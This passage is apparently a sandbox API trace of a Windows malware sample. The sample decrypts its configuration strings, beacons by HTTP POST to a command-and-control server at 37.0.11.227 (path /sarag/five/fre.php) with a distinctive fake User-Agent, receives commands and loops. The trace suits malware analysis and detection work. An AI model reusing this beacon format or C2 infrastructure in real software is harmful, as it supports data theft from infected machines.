(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0315.047] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.048] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0315.048] GetProcessHeap () returned 0x690000 [0315.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0315.048] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0315.049] GetProcessHeap () returned 0x690000 [0315.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0315.051] GetProcessHeap () returned 0x690000 [0315.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0315.052] GetProcessHeap () returned 0x690000 [0315.052] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0315.052] GetProcessHeap () returned 0x690000 [0315.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0315.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.053] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.062] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0315.068] GetProcessHeap () returned 0x690000 [0315.068] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0315.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.069] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0315.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.070] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.071] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.072] GetProcessHeap () returned 0x690000 [0315.073] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0315.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.074] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0315.075] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.075] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0315.076] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.076] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0315.076] GetProcessHeap () returned 0x690000 [0315.076] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0315.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.077] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0315.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.078] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0315.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.079] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0315.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.080] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0315.080] GetProcessHeap () returned 0x690000 [0315.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0315.080] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0315.080] GetProcessHeap () returned 0x690000 [0315.080] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0315.080] socket (af=2, type=1, protocol=6) returned 0xab8 [0315.080] connect (s=0xab8, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0315.105] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0315.105] GetProcessHeap () returned 0x690000 [0315.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0315.105] GetProcessHeap () returned 0x690000 [0315.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0315.105] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0315.106] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0315.107] GetProcessHeap () returned 0x690000 [0315.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0315.107] GetProcessHeap () returned 0x690000 [0315.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0315.107] GetProcessHeap () returned 0x690000 [0315.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0315.107] GetProcessHeap () returned 0x690000 [0315.107] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0315.108] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0315.109] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0315.109] GetProcessHeap () returned 0x690000 [0315.109] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0315.109] GetProcessHeap () returned 0x690000 [0315.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0315.110] send (s=0xab8, buf=0x6ad508*, len=242, flags=0) returned 242 [0315.110] send (s=0xab8, buf=0x6aba40*, len=159, flags=0) returned 159 [0315.110] GetProcessHeap () returned 0x690000 [0315.110] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0315.110] recv (in: s=0xab8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0315.244] GetProcessHeap () returned 0x690000 [0315.245] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0315.245] GetProcessHeap () returned 0x690000 [0315.245] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0315.246] GetProcessHeap () returned 0x690000 [0315.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0315.246] GetProcessHeap () returned 0x690000 [0315.246] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0315.247] closesocket (s=0xab8) returned 0 [0315.248] GetProcessHeap () returned 0x690000 [0315.248] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0315.248] GetProcessHeap () returned 0x690000 [0315.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0315.249] GetProcessHeap () returned 0x690000 [0315.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0315.249] GetProcessHeap () returned 0x690000 [0315.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0315.250] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x15e8) returned 0xab8 [0315.251] Sleep (dwMilliseconds=0xea60) [0315.253] GetProcessHeap () returned 0x690000 [0315.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0315.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.254] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.259] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0315.265] GetProcessHeap () returned 0x690000 [0315.265] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0315.266] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.266] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0315.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.267] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.268] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.268] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.268] GetProcessHeap () returned 0x690000 [0315.268] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0315.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.270] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0315.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.271] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0315.272] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.272] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0315.272] GetProcessHeap () returned 0x690000 [0315.272] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0315.273] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.273] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0315.274] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.274] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0315.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.448] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0315.518] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.519] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0315.519] GetProcessHeap () returned 0x690000 [0315.519] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0315.519] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0315.519] GetProcessHeap () returned 0x690000 [0315.519] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0315.519] GetProcessHeap () returned 0x690000 [0315.520] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0315.520] GetProcessHeap () returned 0x690000 [0315.520] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0315.520] GetProcessHeap () returned 0x690000 [0315.520] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0315.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.521] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.533] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0315.540] GetProcessHeap () returned 0x690000 [0315.540] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0315.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.541] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0315.541] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.542] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.542] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.543] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.543] GetProcessHeap () returned 0x690000 [0315.543] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0315.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.571] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0315.572] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.573] CryptDestroyKey (hKey=0x69d628) returned 1 [0315.574] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.574] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0315.574] GetProcessHeap () returned 0x690000 [0315.574] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0315.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.577] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0315.578] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.578] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0315.579] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.579] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0315.580] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.580] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0315.580] GetProcessHeap () returned 0x690000 [0315.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0315.580] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0315.580] GetProcessHeap () returned 0x690000 [0315.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab430 [0315.580] socket (af=2, type=1, protocol=6) returned 0xabc [0315.581] connect (s=0xabc, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0315.606] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0315.606] GetProcessHeap () returned 0x690000 [0315.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0315.606] GetProcessHeap () returned 0x690000 [0315.606] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0315.607] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0315.608] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0315.608] GetProcessHeap () returned 0x690000 [0315.608] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0315.608] GetProcessHeap () returned 0x690000 [0315.608] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0315.609] GetProcessHeap () returned 0x690000 [0315.609] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0315.609] GetProcessHeap () returned 0x690000 [0315.609] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0315.610] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0315.611] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0315.611] GetProcessHeap () returned 0x690000 [0315.611] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0315.611] GetProcessHeap () returned 0x690000 [0315.612] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0315.612] send (s=0xabc, buf=0x6ad508*, len=242, flags=0) returned 242 [0315.612] send (s=0xabc, buf=0x6aba40*, len=159, flags=0) returned 159 [0315.612] GetProcessHeap () returned 0x690000 [0315.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0315.612] recv (in: s=0xabc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0315.693] GetProcessHeap () returned 0x690000 [0315.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0315.694] GetProcessHeap () returned 0x690000 [0315.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0315.694] GetProcessHeap () returned 0x690000 [0315.694] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0315.695] GetProcessHeap () returned 0x690000 [0315.695] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0315.695] closesocket (s=0xabc) returned 0 [0315.696] GetProcessHeap () returned 0x690000 [0315.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab430 | out: hHeap=0x690000) returned 1 [0315.696] GetProcessHeap () returned 0x690000 [0315.696] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0315.696] GetProcessHeap () returned 0x690000 [0315.697] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0315.697] GetProcessHeap () returned 0x690000 [0315.697] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0315.697] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xa40) returned 0xabc [0315.711] Sleep (dwMilliseconds=0xea60) [0315.713] GetProcessHeap () returned 0x690000 [0315.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0315.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.714] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.718] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0315.750] GetProcessHeap () returned 0x690000 [0315.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0315.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.757] CryptImportKey (in: hProv=0x6af078, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0315.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.758] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.759] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.759] GetProcessHeap () returned 0x690000 [0315.760] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0315.760] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.761] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0315.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.762] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0315.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0315.763] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0315.763] GetProcessHeap () returned 0x690000 [0315.763] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0315.763] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.769] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0315.770] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.770] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0315.771] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.771] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0315.772] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0315.772] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0315.772] GetProcessHeap () returned 0x690000 [0315.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0315.772] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0315.772] GetProcessHeap () returned 0x690000 [0315.773] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0315.773] GetProcessHeap () returned 0x690000 [0315.773] HeapFree (in: hHeap=0x690000, 